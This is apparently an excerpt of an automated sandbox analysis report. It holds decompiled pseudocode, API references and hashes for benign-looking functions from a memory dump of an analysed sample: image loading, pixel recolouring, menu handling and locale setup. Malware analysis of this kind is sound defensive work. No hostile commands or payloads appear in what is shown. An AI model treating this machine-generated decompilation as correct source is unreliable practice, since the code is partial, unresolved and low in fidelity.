0x00d3731b
0x00d37323
0x00d37324
0x00d37329
0x00d3732d
0x00d3733a
0x00d37342
0x00d37353
0x00d37356
0x00d37358
0x00d37361
0x00d3736a
0x00d3736d
0x00d3737b
0x00d37381
0x00d37389
0x00d37415
0x00d37415
0x00d3741b
0x00d3742d
0x00d37436
0x00d3743e
0x00d3744a
0x00d37452
0x00d37452
0x00d37272
0x00d37265
0x00d371e6
0x00d371ed
0x00d371f5
0x00000000
0x00d371f5
0x00d371c3
0x00d371ca
0x00d371cc
0x00d371cc
0x00d371cc
0x00d37459
0x00d3745d
0x00d3745d
0x00d3712b
0x00d37466
0x00d37470
0x00d37475
0x00d3709e
0x00d370a0
0x00d370a0
0x00d37089
0x00d37089
0x00d37089
0x00d37477
0x00d3747c

APIs

__EH_prolog3_GS.LIBCMT ref: 00D37067

Strings

(, xrefs: 00D37182

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_
String ID: (
API String ID: 2427045233-3887548279
Opcode ID: 02633a3505c02130b97608c752f2cd2f64bd1146210786fab60090ed8a83a8d5
Instruction ID: 1135b5768c8d06235c3bea141e6069effec25480ac8af4a318fe9a76fb290618
Opcode Fuzzy Hash: 02633a3505c02130b97608c752f2cd2f64bd1146210786fab60090ed8a83a8d5
Instruction Fuzzy Hash: 63C13B71904629DFDB24DF64DC85BAABBB4FF05300F0081EAE549A6252DB305E94CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA1C3 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CAA288
_memmove.LIBCMT ref: 00CAA2BA
_memmove.LIBCMT ref: 00CAA2EF
_memmove.LIBCMT ref: 00CAA377
_memmove.LIBCMT ref: 00CAA3EE
_memmove.LIBCMT ref: 00CAA459
_memmove.LIBCMT ref: 00CAA49D
_memmove.LIBCMT ref: 00CAA4DA
std::_Xinvalid_argument.LIBCPMT ref: 00CAA507

Strings

invalid string position, xrefs: 00CAA50C
string too long, xrefs: 00CAA502

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 5ea6d6a0e20f28cd2a00188482f10a7b39a918e0c5d43de05455f7f96eaa4edc
Instruction ID: 35eb66595936d71005ee4e9e8566b2b050878e10d51cb206d0552b8de9edd842
Opcode Fuzzy Hash: 5ea6d6a0e20f28cd2a00188482f10a7b39a918e0c5d43de05455f7f96eaa4edc
Instruction Fuzzy Hash: D4D15971A0170AEFCF20CF49D88199AB7F5FF89708B248929F94587201D771EE51CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D3768E Relevance: 18.2, APIs: 12, Instructions: 196
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00D3768E(void* __ecx, void* __edx, void* __fp0) {
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t60;
				signed short _t66;
				void* _t76;
				long _t77;
				void** _t98;
				signed int _t107;
				void* _t115;
				void* _t116;
				WCHAR* _t117;
				WCHAR* _t118;
				void* _t121;
				signed int* _t122;
				signed int* _t123;
				void* _t125;
				void* _t140;

				_t140 = __fp0;
				_t115 = __edx;
				0xe21503(0xa38);
				_t116 = __ecx;
				_t117 =  *(_t125 + 8);
				_t53 = 0;
				if( *((intOrPtr*)(__ecx + 0x28)) == 0) {
					if((0 | _t117 != 0x00000000) == 0) {
						E00D0BD09(__ecx);
					}
					_t98 = _t116 + 0x8c;
					E00D10DEA(_t98);
					_push(_t117);
					E00CA3713(_t98, _t125 - 0xa2c, _t116);
					 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
					if(E00D18A08(_t125 - 0xa2c, "\\", 0) == 0xffffffff && E00D18A08(_t125 - 0xa2c, 0xe943ac, 0) == 0xffffffff && E00D18A08(_t125 - 0xa2c, 0xe9e2a4, 0) == 0xffffffff && GetModuleFileNameW(0, _t125 - 0xa28, 0x104) != 0) {
						0xe2728b(_t125 - 0xa28, _t125 - 0x18, 3, _t125 - 0x618, 0x100, 0, 0, 0, 0);
						0xe2728b(_t117, 0, 0, 0, 0, _t125 - 0x418, 0x100, _t125 - 0x218, 0x100);
						0xe2a208(_t125 - 0x820, 0x104, _t125 - 0x18, _t125 - 0x618, _t125 - 0x418, _t125 - 0x218);
						E00CA66C9(_t98, _t125 - 0xa2c, _t116, _t125 - 0x820);
					}
					if( *((intOrPtr*)(_t125 + 0xc)) <= 0) {
						L12:
						 *(_t125 - 0x18) = 0x2010;
						if( *((intOrPtr*)(_t116 + 0x34)) != 0) {
							 *(_t125 - 0x18) = 0x3010;
						}
						_t118 =  *(_t125 - 0xa2c);
						_t60 = LoadImageW( *(E00D0D804(_t98, _t118) + 8), _t118, 0, 0, 0,  *(_t125 - 0x18));
						 *_t98 = _t60;
						if(_t60 == 0) {
							goto L11;
						} else {
							if(GetObjectW(_t60, 0x18, _t125 - 0xa44) != 0) {
								 *((intOrPtr*)(_t116 + 0x18)) = 1;
								E00CAC13D(_t116 + 0x98, 1, _t125 - 0xa2c);
								if((GetFileAttributesW( *(_t125 - 0xa2c)) & 0x00000001) != 0) {
									 *((intOrPtr*)(_t116 + 0x24)) = 1;
								}
								_t66 =  *((intOrPtr*)(_t125 - 0xa32));
								_t107 = _t66 & 0x0000ffff;
								 *(_t116 + 8) = _t107;
								_t121 = 0x20;
								if(_t107 > 8 && _t107 < _t121) {
									_push(0xffffffff);
									_push(0xffffffff);
									_push(0);
									_push(_t98);
									E00D37C66(_t98, _t115, _t140);
									_t66 =  *((intOrPtr*)(_t125 - 0xa32));
								}
								if(_t66 >= _t121) {
									E00D387DD( *_t98,  *((intOrPtr*)(_t116 + 0x3c)));
								}
								E00D395F6(_t116);
								_t122 = _t116 + 0x90;
								E00D10DEA(_t122);
								 *_t122 =  *_t122 & 0x00000000;
								_t123 = _t116 + 0x94;
								E00D10DEA(_t123);
								 *_t123 =  *_t123 & 0x00000000;
								E00CA656C( &(( *(_t125 - 0xa2c))[0xfffffffffffffff8]), _t115);
								_t53 = 1;
							} else {
								DeleteObject( *_t98);
								 *_t98 =  *_t98 & 0x00000000;
								goto L11;
							}
						}
					} else {
						_t76 = CreateFileW(_t117, 0x80000000, 1, 0, 3, 0, 0);
						 *(_t125 - 0x18) = _t76;
						if(_t76 == 0xffffffff) {
							goto L12;
						} else {
							_t77 = GetFileSize(_t76, 0);
							CloseHandle( *(_t125 - 0x18));
							if(_t77 <=  *((intOrPtr*)(_t125 + 0xc))) {
								goto L12;
							} else {
								L11:
								E00CA656C( *(_t125 - 0xa2c) - 0x10, _t115);
								_t53 = 0;
							}
						}
					}
				}
				0xe214b2();
				return _t53;
			}

0x00d3768e
0x00d3768e
0x00d37698
0x00d3769d
0x00d3769f
0x00d376a2
0x00d376a7
0x00d376b4
0x00d376b6
0x00d376b6
0x00d376bb
0x00d376c2
0x00d376c7
0x00d376ce
0x00d376d3
0x00d376ec
0x00d37763
0x00d37784
0x00d377b1
0x00d377c6
0x00d377c6
0x00d377cf
0x00d3781c
0x00d37820
0x00d37827
0x00d37829
0x00d37829
0x00d37830
0x00d37848
0x00d3784e
0x00d37852
0x00000000
0x00d37854
0x00d37866
0x00d37885
0x00d37888
0x00d3789b
0x00d3789d
0x00d3789d
0x00d378a0
0x00d378a7
0x00d378aa
0x00d378af
0x00d378b3
0x00d378b9
0x00d378bb
0x00d378bd
0x00d378bf
0x00d378c0
0x00d378c5
0x00d378c5
0x00d378cf
0x00d378d6
0x00d378d6
0x00d378dd
0x00d378e2
0x00d378e9
0x00d378ee
0x00d378f1
0x00d378f8
0x00d37903
0x00d37909
0x00d37910
0x00d37868
0x00d3786a
0x00d37870
0x00000000
0x00d37870
0x00d37866
0x00d377d1
0x00d377e0
0x00d377e6
0x00d377ec
0x00000000
0x00d377ee
0x00d377f1
0x00d377fc
0x00d37805
0x00000000
0x00d37807
0x00d37807
0x00d37810
0x00d37815
0x00d37815
0x00d37805
0x00d377ec
0x00d377cf
0x00d37911
0x00d37916

APIs

__EH_prolog3_GS.LIBCMT ref: 00D37698
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00E9E2A4,00000000,00E943AC,00000000,00E92A84,00000000,?,?,00000A38,00D38639,?,00000000,00000038), ref: 00D37736
__wsplitpath_s.LIBCMT ref: 00D37763
__wsplitpath_s.LIBCMT ref: 00D37784
__wmakepath_s.LIBCMT ref: 00D377B1
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00E92A84,00000000,?,?,00000A38,00D38639,?,00000000,00000038), ref: 00D377E0
GetFileSize.KERNEL32(00000000,00000000), ref: 00D377F1
CloseHandle.KERNEL32(?), ref: 00D377FC

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: File$__wsplitpath_s$CloseCreateException@8H_prolog3_HandleModuleNameSizeThrow__wmakepath_s
String ID:
API String ID: 3070774542-0
Opcode ID: ea8671c800500f202534afeb1d9869a0d830ac4bef1e4374c15876b8021eb87a
Instruction ID: 0e6ef76cb3960fd7cf01518dec82ae5ca8ad17635d78ebdc4ab847d0b940595d
Opcode Fuzzy Hash: ea8671c800500f202534afeb1d9869a0d830ac4bef1e4374c15876b8021eb87a
Instruction Fuzzy Hash: CE61B1B2900619BEDB20AB74CC49FEE72ACEF09720F044665F515E61D0DB70AA85CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D37C66 Relevance: 18.2, APIs: 12, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D37C66(void* __ebx, void* __edx, void* __fp0) {
				int _t63;
				int _t66;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				intOrPtr _t75;
				long _t81;
				void* _t82;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t90;
				intOrPtr _t92;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void** _t102;
				int _t103;
				int _t105;
				void* _t107;
				void* _t109;

				_t109 = __fp0;
				_t101 = __edx;
				_t88 = __ebx;
				0xe214d0(0x50);
				_t102 =  *(_t107 + 8);
				if( *_t102 != 0) {
					if( *((intOrPtr*)(_t107 + 0x10)) == 0xffffffff ||  *((intOrPtr*)(_t107 + 0x14)) != 0xffffffff) {
						E00D19EF3(_t107 - 0x34);
						 *(_t107 - 4) =  *(_t107 - 4) & 0x00000000;
						E00D1A8A4(_t88, _t107 - 0x34, _t101,  *0xe8e168(0));
						_push(_t107 - 0x5c);
						_t63 = 0x18;
						if(GetObjectW( *_t102, _t63, ??) == 0) {
							L11:
							_t89 = 0;
							L12:
							 *(_t107 - 4) =  *(_t107 - 4) | 0xffffffff;
							E00D1A049(_t107 - 0x34);
							_t66 = _t89;
							L13:
							0xe2149e();
							return _t66;
						}
						if( *_t102 == 0) {
							_t90 = 0;
							 *(_t107 - 0x1c) = 0;
						} else {
							_t87 = SelectObject( *(_t107 - 0x30),  *_t102);
							_t90 = _t87;
							 *(_t107 - 0x1c) = _t87;
						}
						if(_t90 != 0) {
							_t96 =  *((intOrPtr*)(_t107 - 0x54));
							_t67 =  *((intOrPtr*)(_t107 - 0x58));
							 *((intOrPtr*)(_t107 - 0x10)) = _t67;
							 *((intOrPtr*)(_t107 - 0x18)) = _t96;
							_t68 =  *0xe8e0e4( *(_t107 - 0x30), _t67, _t96);
							 *(_t107 - 0x14) = _t68;
							if(_t68 != 0) {
								E00D19EF3(_t107 - 0x44);
								 *(_t107 - 4) = 1;
								E00D1A8A4(_t90, _t107 - 0x44, _t101,  *0xe8e168( *(_t107 - 0x30)));
								_t72 = SelectObject( *(_t107 - 0x40),  *(_t107 - 0x14));
								 *(_t107 - 0x24) = _t72;
								if(_t72 != 0) {
									 *0xe8e16c( *(_t107 - 0x40), 0, 0,  *((intOrPtr*)(_t107 - 0x10)),  *((intOrPtr*)(_t107 - 0x18)),  *(_t107 - 0x30), 0, 0, 0xcc0020);
									 *(_t107 - 0x20) =  *(_t107 - 0x20) & 0x00000000;
									_t75 =  *((intOrPtr*)(_t107 - 0x10));
									if(_t75 <= 0) {
										L33:
										SelectObject( *(_t107 - 0x40),  *(_t107 - 0x24));
										SelectObject( *(_t107 - 0x30), _t90);
										DeleteObject( *_t102);
										 *_t102 =  *(_t107 - 0x14);
										_t89 = 1;
										L34:
										 *(_t107 - 4) = 0;
										E00D1A049(_t107 - 0x44);
										goto L12;
									}
									_t105 =  *(_t107 - 0x20);
									_t92 =  *((intOrPtr*)(_t107 - 0x18));
									do {
										_t103 = 0;
										if(_t92 <= 0) {
											goto L31;
										} else {
											goto L19;
										}
										do {
											L19:
											_t81 = GetPixel( *(_t107 - 0x40), _t105, _t103);
											 *(_t107 - 0x20) = _t81;
											if( *((intOrPtr*)(_t107 + 0x10)) == 0xffffffff) {
												_t100 = 0x18;
												if( *((intOrPtr*)(_t107 - 0x4a)) != _t100 ||  *0xf01a40 != 0) {
													_t82 = E00D37EC8(_t103, _t105, _t81,  *((intOrPtr*)(_t107 + 0xc)));
												} else {
													_t82 = E00D37F58(_t109, _t81);
												}
												if( *(_t107 - 0x20) == _t82) {
													goto L29;
												}
												_push(_t82);
												L28:
												SetPixel( *(_t107 - 0x40), _t105, _t103, ??);
												goto L29;
											}
											if(_t81 !=  *((intOrPtr*)(_t107 + 0x10))) {
												goto L29;
											}
											_push( *((intOrPtr*)(_t107 + 0x14)));
											goto L28;
											L29:
											_t103 = _t103 + 1;
										} while (_t103 < _t92);
										_t75 =  *((intOrPtr*)(_t107 - 0x10));
										L31:
										_t105 = _t105 + 1;
									} while (_t105 < _t75);
									_t102 =  *(_t107 + 8);
									_t90 =  *(_t107 - 0x1c);
									goto L33;
								}
								SelectObject( *(_t107 - 0x30), _t90);
								DeleteObject( *(_t107 - 0x14));
								_t89 = 0;
								goto L34;
							}
							SelectObject( *(_t107 - 0x30), _t90);
						}
						goto L11;
					} else {
						goto L1;
					}
				}
				L1:
				_t66 = 0;
				goto L13;
			}

0x00d37c66
0x00d37c66
0x00d37c66
0x00d37c6d
0x00d37c72
0x00d37c78
0x00d37c85
0x00d37c90
0x00d37c95
0x00d37ca5
0x00d37cad
0x00d37cb0
0x00d37cbc
0x00d37d04
0x00d37d04
0x00d37d06
0x00d37d06
0x00d37d0d
0x00d37d12
0x00d37d14
0x00d37d14
0x00d37d19
0x00d37d19
0x00d37cc7
0x00d37cd7
0x00d37cd9
0x00d37cc9
0x00d37cce
0x00d37cd0
0x00d37cd2
0x00d37cd2
0x00d37cde
0x00d37ce0
0x00d37ce3
0x00d37ceb
0x00d37cee
0x00d37cf1
0x00d37cf7
0x00d37cfc
0x00d37d1f
0x00d37d27
0x00d37d35
0x00d37d40
0x00d37d42
0x00d37d47
0x00d37d76
0x00d37d7c
0x00d37d80
0x00d37d85
0x00d37dfe
0x00d37e04
0x00d37e0a
0x00d37e0e
0x00d37e19
0x00d37e1b
0x00d37e1c
0x00d37e1f
0x00d37e23
0x00000000
0x00d37e23
0x00d37d87
0x00d37d8a
0x00d37d8d
0x00d37d8d
0x00d37d91
0x00000000
0x00000000
0x00000000
0x00000000
0x00d37d93
0x00d37d93
0x00d37d98
0x00d37da2
0x00d37da5
0x00d37db3
0x00d37db8
0x00d37dcf
0x00d37dc3
0x00d37dc4
0x00d37dc4
0x00d37dd7
0x00000000
0x00000000
0x00d37dd9
0x00d37dda
0x00d37ddf
0x00000000
0x00d37ddf
0x00d37daa
0x00000000
0x00000000
0x00d37dac
0x00000000
0x00d37de5
0x00d37de5
0x00d37de6
0x00d37dea
0x00d37ded
0x00d37ded
0x00d37dee
0x00d37df8
0x00d37dfb
0x00000000
0x00d37dfb
0x00d37d4d
0x00d37d52
0x00d37d58
0x00000000
0x00d37d58
0x00d37d02
0x00d37d02
0x00000000
0x00000000
0x00000000
0x00000000
0x00d37c85
0x00d37c7a
0x00d37c7a
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00D37C6D
GetObjectW.GDI32(?,00000018,?,00000000), ref: 00D37CB4
SelectObject.GDI32(?,?), ref: 00D37CCE
SelectObject.GDI32(?,00000000), ref: 00D37D02
SelectObject.GDI32(?,00000000), ref: 00D37D40
SelectObject.GDI32(?,00000000), ref: 00D37D4D
DeleteObject.GDI32(00000000), ref: 00D37D52
GetPixel.GDI32(?,00000000,00000000), ref: 00D37D98
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00D37DDF
SelectObject.GDI32(?,00EA53B8), ref: 00D37E04
SelectObject.GDI32(?,00000000), ref: 00D37E0A
DeleteObject.GDI32(?), ref: 00D37E0E

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$Select$DeletePixel$H_prolog3
String ID:
API String ID: 1383263504-0
Opcode ID: 8d26c5d5bc50a8def3c338d06eda9fa56b8780c98be6d92864ea82edf53af4b4
Instruction ID: f1d54cff7a6258d493c403323a75f1e281e1d23bcc264e6dcb86c2498437d8c3
Opcode Fuzzy Hash: 8d26c5d5bc50a8def3c338d06eda9fa56b8780c98be6d92864ea82edf53af4b4
Instruction Fuzzy Hash: CB5143B190461AEFDF219FA4EC89AAEBBB5FF08310F140129F515B22A0DB718D55DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CA33E1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA33E8
std::_Lockit::_Lockit.LIBCPMT ref: 00CA33F2

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA3409

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA3412
ctype.LIBCPMT ref: 00CA342C
std::bad_exception::bad_exception.LIBCMT ref: 00CA3440
__CxxThrowException@8.LIBCMT ref: 00CA344E
std::_Facet_Register.LIBCPMT ref: 00CA3464

Strings

bad cast, xrefs: 00CA3438

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2017145326-3145022300
Opcode ID: cf5127cb84d111a27260962261a44127b1e75258e6863c8ea8ec4753b7590fb0
Instruction ID: c6c602d4ca336b9b6dd6c39a97f5fd148ad1c4c184c2c83f73e43e442f33f901
Opcode Fuzzy Hash: cf5127cb84d111a27260962261a44127b1e75258e6863c8ea8ec4753b7590fb0
Instruction Fuzzy Hash: A201D272A0022A8BCF05FFA4E952AED77B4BF55324F145514F5217B191CF349F009791

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3348 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA334F
std::_Lockit::_Lockit.LIBCPMT ref: 00CA3359

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA3370

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA3379
codecvt.LIBCPMT ref: 00CA3393
std::bad_exception::bad_exception.LIBCMT ref: 00CA33A7
__CxxThrowException@8.LIBCMT ref: 00CA33B5
std::_Facet_Register.LIBCPMT ref: 00CA33CB

Strings

bad cast, xrefs: 00CA339F

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 1757418035-3145022300
Opcode ID: 78bc00eba9bf19069c9165a3e85427a5b70ab0079b4d6521dc8db100b3bfe28e
Instruction ID: ca5b4b61c90ba9779bf190a77ce0bc6a3eb2f8d69324d8acbd84065d4ed124fa
Opcode Fuzzy Hash: 78bc00eba9bf19069c9165a3e85427a5b70ab0079b4d6521dc8db100b3bfe28e
Instruction Fuzzy Hash: 0C01D232A0022A8BCF15FBA0E852AED77B4BF45364F140509F5217B2E1CF709F459B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA347A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA3481
std::_Lockit::_Lockit.LIBCPMT ref: 00CA348B

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA34A2

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA34AB
ctype.LIBCPMT ref: 00CA34C5
std::bad_exception::bad_exception.LIBCMT ref: 00CA34D9
__CxxThrowException@8.LIBCMT ref: 00CA34E7
std::_Facet_Register.LIBCPMT ref: 00CA34FD

Strings

bad cast, xrefs: 00CA34D1

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2017145326-3145022300
Opcode ID: 31a22cd65361462fe2e6315caf128135705da2849356ccb4a121e3643b3a7c9e
Instruction ID: 62581c9029875fb9a7c0710134e7cc66317578845d2f03dffcaaf35cebd686bb
Opcode Fuzzy Hash: 31a22cd65361462fe2e6315caf128135705da2849356ccb4a121e3643b3a7c9e
Instruction Fuzzy Hash: 4D01C032A0022A9BCF15FBA0E852AED77B4BF45324F280104F4257B291CF349F449791

Uniqueness

Uniqueness Score: -1.00%

Function 00D0C136 Relevance: 15.1, APIs: 10, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D0C136(signed int _a4) {
				struct HMENU__* _v0;
				signed int _v4;
				struct HMENU__* _v8;
				signed int _v16;
				int _v20;
				int _t31;
				struct HMENU__* _t34;
				signed int _t36;
				int _t38;
				int _t40;
				signed int _t41;
				int _t43;

				0xe214d0();
				_t41 = E00D0BC90(0xe80186, 0xc);
				_t36 = 4;
				_v16 = _t41;
				_v4 = _v4 & 0x00000000;
				if(_t41 == 0) {
					_t41 = 0;
				} else {
					_t36 = _t41;
					E00D0BCEF(_t36);
					 *(_t41 + 8) =  *(_t41 + 8) & 0x00000000;
					 *_t41 = 0xe9e480;
				}
				_v16 = _v16 | 0xffffffff;
				 *(_t41 + 8) = _v4;
				_v4 = _t41;
				0xe2143b( &_v4, 0xee9fd4);
				asm("int3");
				_push(_t36);
				_push(_t36);
				_push(_t41);
				_v20 = GetMenuItemCount(_v4);
				_t31 = GetMenuItemCount(_v8);
				_t43 = _t31 - 1;
				if(_t43 >= 0) {
					do {
						_t31 = GetSubMenu(_v4, _t43);
						_t34 = _t31;
						if(_t34 != 0) {
							if(_a4 == 0) {
								_t38 = 0;
								if(_v16 > 0) {
									while(1) {
										_t31 = GetSubMenu(_v0, _t38);
										if(_t31 == _t34) {
											break;
										}
										_t38 = _t38 + 1;
										if(_t38 < _v16) {
											continue;
										} else {
										}
										goto L17;
									}
									_t31 = RemoveMenu(_v4, _t43, 0x400);
								}
							} else {
								_t31 = GetMenuItemCount(_t34);
								_t40 = 0;
								_v20 = _t31;
								if(_t31 > 0) {
									while(1) {
										_t31 = GetSubMenu(_t34, _t40);
										if(_t31 == _a4) {
											break;
										}
										_t40 = _t40 + 1;
										if(_t40 < _v20) {
											continue;
										} else {
										}
										goto L17;
									}
									_t31 = RemoveMenu(_t34, _t40, 0x400);
									_a4 = _a4 & 0x00000000;
								}
							}
						}
						L17:
						_t43 = _t43 - 1;
					} while (_t43 >= 0);
				}
				return _t31;
			}

0x00d0c13d
0x00d0c149
0x00d0c14b
0x00d0c14c
0x00d0c14f
0x00d0c155
0x00d0c16a
0x00d0c157
